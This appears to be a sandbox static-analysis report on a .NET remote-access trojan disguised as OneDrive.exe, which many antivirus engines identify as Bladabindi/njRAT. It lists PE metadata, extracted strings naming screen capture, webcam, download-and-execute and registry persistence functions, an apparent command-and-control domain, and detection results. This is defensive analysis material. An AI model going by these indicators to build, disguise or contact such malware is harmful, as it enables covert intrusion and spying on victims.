Static | ZeroBOX

PE Compile Time

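2098-06-05 08:58:36 (future-dated, so this is not a real build time: the PE header timestamp was either altered or written by a deterministic build, which stores a hash-derived value in this field. Do not use it for timeline analysis; the "2021" copyright string and the 16.10.0.0 settings-generator version in the strings below are more plausible dating hints.)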

PDB Path

C:\Users\Administrator\Desktop\OneDrive\OneDrive\obj\Debug\OneDrive.pdb

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x000057dc 0x00005800 5.95687367714
.rsrc 0x00008000 0x0001c274 0x0001c400 3.07246418266
.reloc 0x00026000 0x0000000c 0x00000200 0.0815394123432

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x00023830 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00023830 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00023830 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00023830 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00023830 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00023830 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00023830 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00023830 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00023830 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00023830 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00023830 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_GROUP_ICON 0x00023ca8 0x000000a0 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_VERSION 0x00023d58 0x0000031c LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x00024084 0x000001ea LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

Strings

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
Z:Ca;
  s_
 dsA
v2.0.50727
#Strings
<>9__24_0
<PrincipalWorker>b__24_0
E42B910EF43B9832D7930F42EE674A79DE5F75E3B4BF5E5E620A3ADD456DF702
__StaticArrayInitTypeSize=22
D8BF0A855FE0E8D661F4C91CA53DF73752F2182A529E8F6CF750BB726515E132
__StaticArrayInitTypeSize=32
Microsoft.Win32
UInt32
ToInt32
StringToBase64
__StaticArrayInitTypeSize=7
get_UTF8
EB2F1E89B1BC032DCD0BD3A076EB46A773DF8A95D944EF4B5A05063AD20E7689
<Module>
<PrivateImplementationDetails>
032D8D0DD02C4AA3B4E3FC8F9A488BCFD8C82D3DD8309F0CCDC474ADA8848B1A
capGetDriverDescriptionA
System.IO
value__
DownloadData
HandleData
mscorlib
Thread
Synchronized
GetField
RegistryValueKind
GetMethod
Replace
CreateInstance
defaultInstance
CompressionMode
SelectMode
FromImage
DrawImage
get_Message
Invoke
GetEnvironmentVariable
get_Available
IDisposable
get_Handle
RuntimeFieldHandle
RuntimeTypeHandle
GetTypeFromHandle
Rectangle
GetForegroundWindowTitle
Module
get_Name
cbName
GetTempFileName
get_MachineName
rootPathName
get_FullName
get_UserName
className
MutexName
lpszName
GetOsFullname
DateTime
get_LastWriteTime
LocalMachine
ValueType
GetType
FileSystemFeature
get_Culture
set_Culture
resourceCulture
MethodBase
ApplicationSettingsBase
Dispose
get_Date
EditorBrowsableState
CompilerGeneratedAttribute
GuidAttribute
GeneratedCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
EditorBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
FlagsAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
ReadByte
WriteByte
DeleteValue
GetValue
SetValue
defaultValue
Receive
OneDrive
Remove
OneDrive.exe
volumeNameSize
nFileSystemNameSize
set_SendBufferSize
set_ReceiveBufferSize
get_Jpeg
System.Threading
add_SessionEnding
Encoding
System.Drawing.Imaging
FromBase64String
ToBase64String
SendString
Base64ToString
BytesToString
lpString
GetString
System.Drawing
ComputeHash
ComputeStringHash
get_ExecutablePath
GetFolderPath
get_Width
get_Length
processInformationLength
maximumComponentLength
GetWindowTextLength
EndsWith
StartsWith
SessionEndingCallback
RegistryKeyPermissionCheck
System.ComponentModel
Kernel32.dll
avicap32.dll
user32.dll
ntdll.dll
StartupCopiedAssemblyFileStream
NetworkStream
GZipStream
GetStream
MemoryStream
Program
System
HashAlgorithm
resourceMan
ToBoolean
CopyFromScreen
get_PrimaryScreen
CurrentPlugin
rawPlugin
Version
System.IO.Compression
Application
GetVolumeInformation
processInformation
CopyPixelOperation
System.Configuration
System.Globalization
System.Reflection
get_Position
set_Position
Exception
GetGenericInfo
FieldInfo
MethodInfo
FileInfo
CultureInfo
FileSystemInfo
Bitmap
DecompressGzip
ToChar
lpszVer
volumeSerialNumber
GetHardDriveSerialNumber
MD5CryptoServiceProvider
StringBuilder
SpecialFolder
sender
volumeNameBuffer
fileSystemNameBuffer
buffer
get_ResourceManager
PrincipalWorker
SessionEndingEventHandler
System.CodeDom.Compiler
VictimsOwner
CurrentUser
BitConverter
Cursor
.cctor
Monitor
IntPtr
Graphics
System.Diagnostics
get_Bounds
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.Resources
OneDrive.Properties.Resources.resources
DebuggingModes
OneDrive.Properties
GetModules
GetValueNames
GetTypes
SendBytes
WriteAllBytes
StringToBytes
GetBytes
fileSystemFlags
SocketFlags
Settings
SessionEndingEventArgs
System.Windows.Forms
Contains
StringSplitOptions
get_Chars
RuntimeHelpers
Cursors
processInformationClass
hProcess
NtSetInformationProcess
GetCurrentProcess
System.Net.Sockets
SystemEvents
DoEvents
CameraExists
Concat
ImageFormat
PixelFormat
Object
Connect
System.Net
set_MinWorkingSet
Socket
get_Height
op_Explicit
get_Default
get_Client
WebClient
CurrentTcpClient
Environment
nMaxCount
ThreadStart
Convert
set_SendTimeout
set_ReceiveTimeout
System.Text
GetWindowText
GetForegroundWindow
wDriverIndex
GlobalMutex
InitializeArray
ToArray
CreateSubKey
OpenSubKey
RegistryKey
System.Security.Cryptography
get_Assembly
Memory
DeleteValueFromRegistry
GetValueFromRegistry
StoreValueOnRegistry
op_Equality
op_Inequality
WrapNonExceptionThrows
OneDrive
Copyright
2021
$ab4620bb-da7d-4571-8da8-2e859058d518
1.0.0.0
3System.Resources.Tools.StronglyTypedResourceBuilder
16.0.0.0
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
16.10.0.0
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
C:\Users\Administrator\Desktop\OneDrive\OneDrive\obj\Debug\OneDrive.pdb
_CorExeMain
mscoree.dll
musicnote.soundcast.me
@!#&^%$
279f6960ed84a752570aca7fb2dc1552
HJr()b
4(PCFc%Q
@^kwVh
bg7jB<4"
a#mb'E
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
OneDrive.Properties.Resources
zwazwczwtzw
Unknown error
getvalue
Execute ERROR
Download ERROR
Executed As
Execute ERROR
Update ERROR
Updating To
Update ERROR
3losh-rat
3losh-
Software\
yy-MM-dd
??-??-??
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductName
CSDVersion
Microsoft
Microsoft
SystemDrive
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
OneDrive
FileVersion
1.0.0.0
InternalName
OneDrive.exe
LegalCopyright
Copyright
2021
LegalTrademarks
OriginalFilename
OneDrive.exe
ProductName
OneDrive
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
Antivirus Signature
Bkav Clean
Lionic Clean
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.Generic.30044843
FireEye Generic.mg.ae4019c955855d44
CAT-QuickHeal Clean
McAfee GenericRXAA-AA!AE4019C95585
Cylance Unsafe
VIPRE Clean
Sangfor Suspicious.Win32.Save.a
K7AntiVirus Trojan ( 005174541 )
BitDefender Trojan.Generic.30044843
K7GW Trojan ( 005174541 )
Cybereason malicious.955855
Baidu Clean
Cyren Clean
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of MSIL/Bladabindi.IU
APEX Malicious
Paloalto generic.ml
ClamAV Clean
Kaspersky HEUR:Backdoor.MSIL.Bladabindi.gen
Alibaba Backdoor:MSIL/Bladabindi.540f8bf7
NANO-Antivirus Trojan.Win32.Bladabindi.jbnlme
ViRobot Clean
Avast Win32:RATX-gen [Trj]
Tencent Msil.Backdoor.Bladabindi.Lohk
Ad-Aware Trojan.Generic.30044843
TACHYON Clean
Emsisoft Trojan.Bladabindi (A)
Comodo Clean
F-Secure Clean
DrWeb BackDoor.BladabindiNET.10
Zillya Backdoor.Bladabindi.Win32.25641
TrendMicro Clean
McAfee-GW-Edition Artemis!Trojan
CMC Clean
Sophos Mal/Generic-S
Ikarus Trojan.MSIL.Bladabindi
GData Trojan.Generic.30044843
Jiangmin Backdoor.MSIL.faoi
Webroot Clean
Avira TR/Spy.Gen8
Antiy-AVL Trojan/Generic.ASMalwS.349CC89
Kingsoft Clean
Gridinsoft Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Trojan:MSIL/Bladabindi.OK!MTB
Cynet Malicious (score: 99)
AhnLab-V3 Malware/Win32.RL_Generic.C3552992
Acronis Clean
BitDefenderTheta Gen:NN.ZemsilF.34142.im0@aSS61Fe
ALYac Trojan.Generic.30044843
MAX malware (ai score=83)
VBA32 TScope.Trojan.MSIL
Malwarebytes Malware.AI.1590992093
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R002C0DIG21
Rising Clean
Yandex Clean
SentinelOne Static AI - Malicious PE
eGambit Unsafe.AI_Score_99%
Fortinet MSIL/Bladabindi.AZ!tr
AVG Win32:RATX-gen [Trj]
Panda Trj/GdSda.A
CrowdStrike win/malicious_confidence_100% (W)
MaxSecure Trojan.Malware.300983.susgen
No IRMA results available.